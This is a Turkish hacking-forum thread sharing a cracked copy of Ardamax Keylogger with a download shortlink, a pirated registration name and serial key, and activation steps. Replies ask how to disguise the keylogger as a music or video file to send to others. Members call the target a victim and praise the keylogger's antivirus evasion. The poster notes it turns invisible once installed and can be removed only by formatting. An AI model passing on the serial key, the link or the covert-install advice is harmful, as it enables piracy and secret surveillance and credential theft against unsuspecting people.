Ardamax Keylogger 3.7 Full Serial Key Video Anlatım //ChoqFena

ChoqFena

Katılımcı Üye
1 Ocak 2012
264
0
Tekirdağ
//ChoqFena// - //TÜRK HACK TEAM//

_MWYF0cnIQVmz4Zu9IsEOPL9u55Wc-0gCIczKr_9PMQWSjrMCzWHVNAQs_5gtkbgX_jFcdAEZ_KcAoRiW0ED54Z5QN2HiqfI36DEsG4

İndirme : https://tik.lat/67FAl

Aktif etme :

1- Programı çalıştırın.

2- Görev çubuğunda bulunan logosuna sağ tıklayıp, "Enter Registiration Key" şıkkına tıklayın.

3- Bu bilgileri girin.

Name : ExiledPHx
Key : A81U-9E4V-UVK8-C8P5

4- Aktif edildi.

Kullanım :

[ame]https://www.youtube.com/watch?v=IwPz5eoeaBA&t=131s[/ame]

Eğer Gerçekten İşinize Yaradıysa Veya Beğendiyseniz Anlatımımı Teşekkür Etmeniz Yeterlidir.

Birkaç Yorum Artık Sizlere Kalmış Arkadaşlar :)

eline saglık çok güzel olmus begendim

teşekkürler çalışıyor :)

Eline sağlık paylaşım için teşekkürler 1-2 sorum olcaktı bu konularda yeniyimde şimdiden cevap veren vermeyen herkeze teşekkürler =)

1- Bunu videolara koyabiliyormuyuz ? videolara koyarsak video açıldığında normal video oynarmı ?​

2- Yoksa sadece exe leremi koyuyoruz ? Teşekkürler.​

Bu Bu GuzEL iSte ELine SaqLık

evet malesef kurbanımızın oylebı dez avantajıvar :) tekrar program için teşşekürler çok guzel pro çok sevdim kendisini baya işe yarar antilerden %100 kacanzi olursa bundan sonra keylog olarak bitek onu tanıcam sanırım :D

//ChoqFena// - //TÜRK HACK TEAM//

Moderatör tarafında düzenlendi:

rebelliion

Yeni üye
21 Ocak 2012
19
0
hocam sımdı ındırıyorumm deneyıp yorumuımu ole yazıcaktım ama şefteyi ben yapayım inş. iyidir eline sağlık

dngsz155

Yeni üye
23 Ocak 2012
1
0
Ya bende Uzaktan kotrol gibi birşey yok . Kendi bilgisayarımdan programı yaptım ama müzik dosyası gibi yapıp başkasına nasıl atcam ??

ChoqFena

Katılımcı Üye
1 Ocak 2012
264
0
Tekirdağ
Arkadaşlar Açıklama Getirmek Zorunda Kaldım Server .

C:\Program Files\MST\

MST Dosyası Nerede İse Keylogger Oraya Kurulmuştur Sakın Tıklamayın

Eğer Uzaktan Kurulum Yoksa Silip Birdaha Kurun VE Serail Düzgün Yazınız.

Umarım Açıklayıcı Olmuştur.

Yorumlarınız İçin Teşekkürler :)

dubidis

Yeni üye
17 Ocak 2012
33
0
eDiT bY_puriya
Reklam Yapmak Yasaktır..

Moderatör tarafında düzenlendi:

bysamba

Yeni üye
22 Ocak 2012
3
0
Bakdıysanız bı bılgılendırırsenız sevınırım Kullanıcı adı veya parola yanlıs dıor kuruluma gecmeden once ...

ChoqFena

Katılımcı Üye
1 Ocak 2012
264
0
Tekirdağ
Kardeş InsTaLL Yedireceksiniz

Birdaha Uyarıyım Sakın Tıklamayin Çünkü Tıklarsanız Temizleyemezsiniz Tıklandıktan Sonra Görünmez Oluyor :D

Bysamba Kardeş Team Varsa Özelden AT Team Yapayim İstersen :)

Önemli Olan Yararlanmanız :)

rebelliion

Yeni üye
21 Ocak 2012
19
0
choqfena bu reset attığında kalıyormu ? bıde program kayboldu bulamıyorum fakat log almaya devam edıyor

ChoqFena

Katılımcı Üye
1 Ocak 2012
264
0
Tekirdağ
Kardeşim Program Kaybolduysa Sen O Install Tıklamışın Demektir Ve Formattan Başka Çözümü Yok Kaç Defa Uyardım :/

Hiç Biryerden bulamazsın Gözükmez :(

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.